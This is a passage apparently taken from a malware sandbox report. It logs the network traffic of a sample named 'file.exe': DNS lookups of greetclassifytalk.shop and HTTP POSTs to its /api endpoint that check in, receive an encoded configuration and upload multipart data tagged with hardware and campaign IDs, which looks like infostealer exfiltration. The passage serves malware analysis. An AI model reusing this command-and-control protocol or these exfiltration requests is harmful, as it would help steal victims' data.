                                                    Apr 25, 2024 13:33:06.358730078 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.358786106 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.358946085 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.358974934 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.359136105 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.359164953 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.359349966 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.359380960 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.359394073 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.359586954 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.359618902 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.404120922 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.404355049 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.404408932 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.404428005 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.452105999 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.452315092 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.452362061 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.452390909 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.500118017 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.500395060 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.548115969 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.691236019 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:07.929084063 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:07.929426908 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:07.929428101 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:07.929507017 CEST49737443192.168.2.4104.21.51.78
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 25, 2024 13:32:58.942006111 CEST5644253192.168.2.41.1.1.1
                                                    Apr 25, 2024 13:32:59.088901997 CEST53564421.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Apr 25, 2024 13:32:58.942006111 CEST192.168.2.41.1.1.10xf04cStandard query (0)greetclassifytalk.shopA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Apr 25, 2024 13:32:59.088901997 CEST1.1.1.1192.168.2.40xf04cNo error (0)greetclassifytalk.shop104.21.51.78A (IP address)IN (0x0001)false
                                                    Apr 25, 2024 13:32:59.088901997 CEST1.1.1.1192.168.2.40xf04cNo error (0)greetclassifytalk.shop172.67.177.98A (IP address)IN (0x0001)false
                                                    Apr 25, 2024 13:33:16.475043058 CEST1.1.1.1192.168.2.40xe122No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                    Apr 25, 2024 13:33:16.475043058 CEST1.1.1.1192.168.2.40xe122No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                    • greetclassifytalk.shop
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:32:59 UTC269OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: greetclassifytalk.shop
                                                    2024-04-25 11:32:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
                                                    2024-04-25 11:33:00 UTC808INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:32:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=319patchjv6ien05gi29pp6n8t; expires=Mon, 19-Aug-2024 05:19:38 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PH6UQEoW4b35O6Q4I9SzJUV1xY1TyvQRM%2B%2FDMIlswaGe7XIcLicdImoZhNTlCBH8n%2FwoF3AESWQYP03H40rK%2BdC1EqhavdlrBgaO44pL4lZn7qf0jFYChOHJ3KaCBJ%2BKxl9ZZ0hJXgHK"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e040108a6b04e-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-25 11:33:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2024-04-25 11:33:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449731104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:33:00 UTC270OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 49
                                                    Host: greetclassifytalk.shop
                                                    2024-04-25 11:33:00 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 73 78 46 4b 75 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                    Data Ascii: act=recive_message&ver=4.0&lid=4sxFKu--&j=default
                                                    2024-04-25 11:33:00 UTC802INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:33:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=7o079nv23d1dvb592s36fvkjmd; expires=Mon, 19-Aug-2024 05:19:39 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyXkmB0fVkBJbvzSUS0fVGliEQBjVculd406K896Y49Trxz%2FcEPIa57F61hqYxqbCDAGxsHUBBk2az8%2Bhl4tCbcBbdo5NKuJHckFCUQLwNMWHU6ZIKbSGSx0XiLyGN3CRnGC08HWSU9m"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e0405ecca7bb1-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-25 11:33:00 UTC567INData Raw: 34 66 63 0d 0a 62 6d 6c 67 55 51 6c 5a 38 37 62 69 47 79 2b 31 4a 41 66 69 6f 6d 37 50 6d 67 4e 54 77 31 42 6d 6a 50 6e 79 76 61 42 6e 62 35 38 56 59 32 6c 7a 66 33 76 4a 6c 74 59 33 4a 62 77 47 64 49 65 41 56 4f 2f 75 63 53 61 6d 66 47 79 46 32 35 50 5a 67 6c 31 50 2b 51 38 46 45 7a 51 6c 55 2f 71 55 6a 32 4d 4e 6a 77 52 63 36 4b 73 56 78 5a 4d 4b 63 61 59 2b 52 4c 62 5a 30 4d 72 46 42 51 72 6e 47 67 77 4f 49 6d 41 32 6e 66 61 50 66 6c 76 55 53 57 61 52 79 55 43 6d 39 53 46 2f 79 56 6c 76 72 70 79 49 6e 35 70 48 54 64 49 4c 48 51 45 63 61 43 71 59 6c 4d 34 52 4a 72 77 47 59 70 61 41 56 4f 2b 34 58 33 47 7a 4d 52 54 74 6c 49 48 68 67 6c 30 55 77 30 77 41 46 44 52 37 4f 49 66 66 6a 58 56 63 36 51 59 39 31 4a 4a 65 2f 36 6f 7a 4c 75 46 61 62 2f 48 7a 2b 2b
                                                    Data Ascii: 4fcbmlgUQlZ87biGy+1JAfiom7PmgNTw1BmjPnyvaBnb58VY2lzf3vJltY3JbwGdIeAVO/ucSamfGyF25PZgl1P+Q8FEzQlU/qUj2MNjwRc6KsVxZMKcaY+RLbZ0MrFBQrnGgwOImA2nfaPflvUSWaRyUCm9SF/yVlvrpyIn5pHTdILHQEcaCqYlM4RJrwGYpaAVO+4X3GzMRTtlIHhgl0Uw0wAFDR7OIffjXVc6QY91JJe/6ozLuFab/Hz++
                                                    2024-04-25 11:33:00 UTC716INData Raw: 32 66 31 59 31 35 58 39 39 4e 62 6f 58 53 42 36 54 31 62 44 47 73 4f 41 76 74 6d 35 66 56 79 41 6f 48 2b 51 45 47 42 44 4e 72 65 39 2b 38 36 78 49 4e 30 46 34 6c 32 49 4a 4d 6a 76 31 78 4e 71 30 6b 52 74 54 62 2b 4c 54 64 53 32 61 2f 54 6d 4e 70 4b 67 4e 51 2b 70 53 48 64 51 32 50 42 43 57 49 78 51 2b 75 38 32 34 79 71 54 6b 57 37 6f 6d 57 30 73 63 58 43 2f 67 43 41 51 45 68 59 54 57 58 31 34 6c 79 52 4e 4a 42 59 63 43 4f 5a 4d 61 54 49 54 61 35 63 6c 79 73 32 37 48 53 79 51 6b 48 36 67 78 4c 61 6c 68 30 64 66 6d 2f 6d 52 45 6d 76 41 5a 69 6a 49 42 55 37 37 68 6c 4d 4b 55 7a 41 4f 43 56 6c 4e 50 45 43 77 44 79 43 67 45 43 4e 47 45 7a 6d 64 57 4e 63 6b 4c 58 51 32 69 45 78 67 43 73 2f 53 46 2f 79 56 6c 76 72 70 79 49 6e 35 70 48 54 64 4d 4c 43 42 42 78 58
                                                    Data Ascii: 2f1Y15X99NboXSB6T1bDGsOAvtm5fVyAoH+QEGBDNre9+86xIN0F4l2IJMjv1xNq0kRtTb+LTdS2a/TmNpKgNQ+pSHdQ2PBCWIxQ+u824yqTkW7omW0scXC/gCAQEhYTWX14lyRNJBYcCOZMaTITa5clys27HSyQkH6gxLalh0dfm/mREmvAZijIBU77hlMKUzAOCVlNPECwDyCgECNGEzmdWNckLXQ2iExgCs/SF/yVlvrpyIn5pHTdMLCBBxX
                                                    2024-04-25 11:33:00 UTC1369INData Raw: 33 35 65 38 0d 0a 41 68 33 78 41 52 30 46 63 77 4e 51 6a 70 72 6f 45 6c 53 2f 4c 51 37 41 78 77 44 74 6f 43 4e 78 70 7a 34 42 34 5a 57 51 30 63 4d 49 43 2f 6b 42 43 78 41 31 65 54 79 51 31 34 4e 2f 53 4e 4e 47 5a 49 58 46 43 4b 58 38 62 54 37 68 66 47 79 46 38 4e 44 59 32 6b 56 56 76 30 77 6b 46 54 31 39 4d 49 58 54 6b 47 68 33 6c 58 4e 6d 6a 73 34 4c 75 37 67 4a 57 72 35 38 62 49 57 43 2b 4c 53 70 52 51 72 78 54 46 4e 41 63 32 49 70 67 39 43 47 63 6b 62 46 56 47 2b 45 77 51 32 71 39 32 41 36 70 44 34 4f 35 5a 2b 43 31 38 73 47 48 2f 6b 4d 41 41 67 31 4b 33 58 35 76 2b 73 35 53 73 38 47 50 63 4b 41 4b 4b 44 6f 62 54 71 33 4e 52 54 62 6d 4a 37 52 78 52 4e 4e 6c 57 63 55 54 46 73 41 49 76 6d 2f 36 7a 6c 4b 32 77 59 39 77 6f 41 44 6f 76 64 70 4d 61 41 32 43
                                                    Data Ascii: 35e8Ah3xAR0FcwNQjproElS/LQ7AxwDtoCNxpz4B4ZWQ0cMIC/kBCxA1eTyQ14N/SNNGZIXFCKX8bT7hfGyF8NDY2kVVv0wkFT19MIXTkGh3lXNmjs4Lu7gJWr58bIWC+LSpRQrxTFNAc2Ipg9CGckbFVG+EwQ2q92A6pD4O5Z+C18sGH/kMAAg1K3X5v+s5Ss8GPcKAKKDobTq3NRTbmJ7RxRNNlWcUTFsAIvm/6zlK2wY9woADovdpMaA2C
                                                    2024-04-25 11:33:00 UTC1369INData Raw: 30 71 55 55 4b 35 55 78 54 51 48 4e 62 4e 70 33 66 6a 44 74 34 31 45 68 72 68 39 5a 4d 78 5a 4e 2b 66 38 6c 5a 48 59 62 77 2b 35 2f 46 43 55 32 6c 54 6b 73 4e 4d 6d 59 78 6d 74 71 4d 65 45 33 54 52 57 2b 41 7a 77 6d 72 38 47 67 78 73 7a 55 4c 37 35 71 62 31 4d 38 4c 43 50 77 4a 44 45 4a 39 41 31 44 36 6c 49 64 68 44 59 38 45 4a 61 33 70 4e 75 32 51 43 69 37 76 57 6d 2f 33 38 2f 75 30 67 67 49 42 76 56 52 4a 51 6a 64 68 4f 35 7a 65 69 33 5a 4f 30 45 68 6c 6a 63 6f 65 70 66 68 68 50 36 63 7a 43 4f 75 61 6e 4e 7a 51 43 51 76 77 43 67 4d 51 63 79 56 54 2b 72 2f 41 66 6c 57 58 48 69 66 41 34 41 65 68 2b 32 30 77 70 6e 41 6c 35 4a 69 62 30 34 41 77 44 76 4d 43 44 42 52 7a 41 31 43 4f 6d 75 67 53 56 4c 38 74 44 73 44 48 41 4f 32 67 49 33 47 6c 4e 67 6a 75 6e 4a
                                                    Data Ascii: 0qUUK5UxTQHNbNp3fjDt41Ehrh9ZMxZN+f8lZHYbw+5/FCU2lTksNMmYxmtqMeE3TRW+Azwmr8GgxszUL75qb1M8LCPwJDEJ9A1D6lIdhDY8EJa3pNu2QCi7vWm/38/u0ggIBvVRJQjdhO5zei3ZO0EhljcoepfhhP6czCOuanNzQCQvwCgMQcyVT+r/AflWXHifA4Aeh+20wpnAl5Jib04AwDvMCDBRzA1COmugSVL8tDsDHAO2gI3GlNgjunJ
                                                    2024-04-25 11:33:00 UTC1369INData Raw: 42 50 59 41 41 41 59 2f 59 6a 36 58 31 59 56 38 54 4e 4e 4b 62 34 62 44 44 36 4c 33 62 6a 6e 68 66 47 79 46 38 4e 44 59 32 6b 56 56 76 30 77 75 46 54 68 6c 50 64 47 38 36 32 59 44 76 79 31 38 36 4b 74 6e 37 66 39 74 63 66 6c 77 52 4f 4b 53 6c 74 6e 48 43 51 7a 37 42 41 34 4b 4e 32 6f 39 6c 39 65 50 66 55 6a 57 53 57 47 4d 7a 67 61 73 2b 57 30 36 72 6a 6b 42 72 74 58 34 74 4b 6c 46 43 75 56 4d 55 30 42 7a 57 6a 69 48 77 35 42 31 44 62 38 74 65 73 36 6f 5a 37 53 51 43 6c 72 68 4e 51 69 75 77 39 4b 66 77 78 63 48 39 77 49 4f 44 54 5a 6f 4e 4a 62 5a 68 6e 56 48 33 6b 35 6a 6a 38 6b 65 72 76 52 76 4e 71 38 2b 43 75 4f 52 6b 39 4b 43 53 32 57 57 5a 30 73 46 4b 79 74 6a 30 35 53 73 66 6b 44 35 54 57 6d 48 67 47 54 47 35 79 39 5a 79 69 74 73 68 66 44 51 32 4d 35
                                                    Data Ascii: BPYAAAY/Yj6X1YV8TNNKb4bDD6L3bjnhfGyF8NDY2kVVv0wuFThlPdG862YDvy186Ktn7f9tcflwROKSltnHCQz7BA4KN2o9l9ePfUjWSWGMzgas+W06rjkBrtX4tKlFCuVMU0BzWjiHw5B1Db8tes6oZ7SQClrhNQiuw9KfwxcH9wIODTZoNJbZhnVH3k5jj8kervRvNq8+CuORk9KCS2WWZ0sFKytj05SsfkD5TWmHgGTG5y9ZyitshfDQ2M5
                                                    2024-04-25 11:33:00 UTC1369INData Raw: 41 38 4a 4f 32 63 2b 6d 64 47 42 63 55 66 66 53 57 71 53 77 51 4f 6b 2f 32 6f 38 72 6a 77 42 34 49 6d 58 31 4d 6b 4e 42 50 4d 4b 53 30 78 62 41 46 44 52 30 35 67 35 46 5a 55 47 55 34 50 4f 42 37 7a 33 59 6a 33 68 57 6d 2f 78 31 66 69 30 32 32 31 6d 6c 6b 77 4d 44 6e 4d 7a 65 64 48 59 6a 6e 6c 43 32 30 70 75 69 4d 45 41 6f 2f 39 6b 4f 4b 6b 36 46 75 2b 66 6d 4e 37 4d 43 67 7a 35 43 51 34 47 4e 47 38 39 6e 70 54 4f 45 53 61 38 42 6d 4b 59 67 46 54 76 75 45 34 32 74 42 4d 2b 72 76 50 37 77 49 78 74 5a 75 52 6b 59 47 6c 7a 62 44 66 52 6a 4d 49 35 52 39 78 43 5a 6f 54 46 41 36 7a 35 5a 79 4f 6d 4f 78 62 67 6c 70 2f 58 79 67 77 4d 2b 51 6b 47 42 44 39 68 4f 70 62 61 6a 6e 45 4e 6d 53 34 4f 36 34 41 4c 74 62 67 35 63 2b 45 54 46 50 57 4a 68 74 4c 6a 43 41 4b 39
                                                    Data Ascii: A8JO2c+mdGBcUffSWqSwQOk/2o8rjwB4ImX1MkNBPMKS0xbAFDR05g5FZUGU4POB7z3Yj3hWm/x1fi0221mlkwMDnMzedHYjnlC20puiMEAo/9kOKk6Fu+fmN7MCgz5CQ4GNG89npTOESa8BmKYgFTvuE42tBM+rvP7wIxtZuRkYGlzbDfRjMI5R9xCZoTFA6z5ZyOmOxbglp/XygwM+QkGBD9hOpbajnENmS4O64ALtbg5c+ETFPWJhtLjCAK9
                                                    2024-04-25 11:33:00 UTC1369INData Raw: 4d 7a 65 64 48 66 69 48 5a 66 30 6b 39 74 68 4d 6b 4d 71 66 4a 73 4e 71 45 33 43 65 75 66 6e 74 76 46 42 51 48 79 43 77 4d 4e 4e 32 73 30 30 5a 72 6f 45 69 61 58 51 58 33 41 6d 45 37 74 32 47 6f 6e 67 44 77 50 2f 4e 76 34 74 4e 31 4c 5a 5a 59 56 59 32 6c 59 4b 7a 79 64 6c 4e 67 37 44 64 6c 50 5a 49 6a 4f 41 4b 58 38 63 7a 47 71 4f 77 76 76 6c 4a 44 63 77 77 38 46 37 77 6f 4c 43 54 74 73 4d 35 58 61 6b 6e 68 43 6c 77 67 4e 36 36 74 4d 71 75 41 68 61 65 4e 79 4e 66 69 63 6c 39 43 41 4c 41 72 6d 44 51 45 42 4f 47 64 37 2b 62 2b 66 4e 79 57 38 58 77 33 72 71 30 79 71 39 43 46 70 34 33 49 4a 34 70 61 55 7a 63 34 46 44 66 51 4c 41 52 41 38 5a 44 61 53 31 49 56 72 54 4d 56 4a 62 6f 58 44 43 4b 4c 33 62 54 6d 72 63 6b 71 47 38 50 75 66 78 52 31 4e 70 55 35 4c 4c
                                                    Data Ascii: MzedHfiHZf0k9thMkMqfJsNqE3CeufntvFBQHyCwMNN2s00ZroEiaXQX3AmE7t2GongDwP/Nv4tN1LZZYVY2lYKzydlNg7DdlPZIjOAKX8czGqOwvvlJDcww8F7woLCTtsM5XaknhClwgN66tMquAhaeNyNficl9CALArmDQEBOGd7+b+fNyW8Xw3rq0yq9CFp43IJ4paUzc4FDfQLARA8ZDaS1IVrTMVJboXDCKL3bTmrckqG8PufxR1NpU5LL
                                                    2024-04-25 11:33:00 UTC1369INData Raw: 52 6c 4d 34 52 4a 72 77 47 59 70 69 41 56 4f 2b 34 51 69 61 33 4f 42 2b 75 38 2f 76 41 6a 47 31 6d 35 47 52 67 61 58 4e 73 4e 39 47 4d 77 6a 6c 41 30 45 68 74 68 73 34 4b 76 2f 52 75 4e 36 45 7a 44 75 4f 58 6d 39 6a 4d 44 67 76 34 41 51 73 45 4e 57 38 2f 6c 64 71 44 4f 51 4f 2f 4c 51 37 41 78 78 54 74 6f 43 4e 78 68 68 38 31 72 4c 69 48 79 63 67 43 41 65 73 48 43 67 45 6c 5a 69 76 52 76 4f 74 6d 41 37 38 74 66 4f 69 72 5a 2b 33 2f 62 58 48 35 63 45 54 6c 6c 5a 58 65 7a 67 38 4b 38 78 34 4b 43 44 39 71 50 4a 62 66 6b 6e 4a 66 33 45 35 6d 6a 73 67 46 72 66 5a 68 4d 4b 77 79 52 4b 44 7a 2b 37 53 43 41 68 57 39 56 45 6c 43 46 6b 67 73 68 39 37 43 57 6c 72 42 54 47 4b 4d 31 67 65 73 2b 33 63 38 73 58 4a 73 68 59 54 65 74 36 6b 63 5a 5a 5a 6e 53 77 55 2f 4b 32
                                                    Data Ascii: RlM4RJrwGYpiAVO+4Qia3OB+u8/vAjG1m5GRgaXNsN9GMwjlA0Ehths4Kv/RuN6EzDuOXm9jMDgv4AQsENW8/ldqDOQO/LQ7AxxTtoCNxhh81rLiHycgCAesHCgElZivRvOtmA78tfOirZ+3/bXH5cETllZXezg8K8x4KCD9qPJbfknJf3E5mjsgFrfZhMKwyRKDz+7SCAhW9VElCFkgsh97CWlrBTGKM1ges+3c8sXJshYTet6kcZZZnSwU/K2
                                                    2024-04-25 11:33:00 UTC1369INData Raw: 45 67 33 52 42 6a 33 43 6b 45 4c 46 6b 77 70 78 70 53 4e 45 74 74 6e 41 6a 5a 6c 51 58 71 70 63 57 57 70 59 64 48 58 35 76 35 6b 52 4a 72 77 47 63 38 43 59 54 76 2b 32 43 56 72 4b 63 68 61 75 77 39 4b 66 68 51 73 41 2f 41 38 46 41 53 46 35 50 5a 4c 43 67 7a 35 7a 36 57 64 6f 69 38 77 42 6f 76 4e 66 44 34 41 2f 44 2b 4b 57 6e 39 54 38 4f 78 6a 2b 41 67 55 46 4a 58 70 37 33 37 7a 72 45 67 33 59 42 6a 33 43 2b 55 7a 6c 75 46 35 2f 79 56 6c 76 72 6f 50 51 68 34 42 46 4f 50 34 43 42 51 55 6c 65 6e 61 77 32 59 74 31 51 4e 68 4e 4a 63 36 6f 5a 38 61 34 5a 33 48 35 63 46 53 67 38 2f 75 30 67 67 45 63 76 56 52 4a 55 6d 45 77 62 73 4b 44 30 43 73 6c 76 46 6b 72 36 4b 73 56 78 5a 4d 4b 63 62 64 79 58 4b 7a 4a 33 72 65 70 62 6b 33 76 54 46 4e 41 63 79 77 34 67 38 61
                                                    Data Ascii: Eg3RBj3CkELFkwpxpSNEttnAjZlQXqpcWWpYdHX5v5kRJrwGc8CYTv+2CVrKchauw9KfhQsA/A8FASF5PZLCgz5z6Wdoi8wBovNfD4A/D+KWn9T8Oxj+AgUFJXp737zrEg3YBj3C+UzluF5/yVlvroPQh4BFOP4CBQUlenaw2Yt1QNhNJc6oZ8a4Z3H5cFSg8/u0ggEcvVRJUmEwbsKD0CslvFkr6KsVxZMKcbdyXKzJ3repbk3vTFNAcyw4g8a


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449732104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:33:01 UTC288OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 18158
                                                    Host: greetclassifytalk.shop
                                                    2024-04-25 11:33:01 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 31 32 39 44 35 33 31 33 36 35 37 39 37 32 35 44 38 42 37 35 43 44 30 39 43 35 43 32 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 73 78 46 4b 75 2d 2d 0d 0a 2d 2d 62
                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DA129D53136579725D8B75CD09C5C254--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4sxFKu----b
                                                    2024-04-25 11:33:01 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                    Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                    2024-04-25 11:33:01 UTC810INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:33:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=ku7hk7r44c92j8t34fl2dgo8ni; expires=Mon, 19-Aug-2024 05:19:40 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=urcKZ1q%2F5F40y11H2gpWh2AOha%2BhvclB7qLPub1xuwIK%2Fz8K45yYQpplsyoeFcFyJOu8kjTOQEywlo9lRM1ytdWCfd90Vyh%2FxUzzyiAlTcCQUAkOD5fBa%2FAKzwSMu3Y8SWhab%2BEVDS5p"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e040b3e92451b-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-25 11:33:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                    Data Ascii: 11ok 185.152.66.230
                                                    2024-04-25 11:33:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449733104.21.51.784437328C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-25 11:33:02 UTC287OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8779
                                                    Host: greetclassifytalk.shop
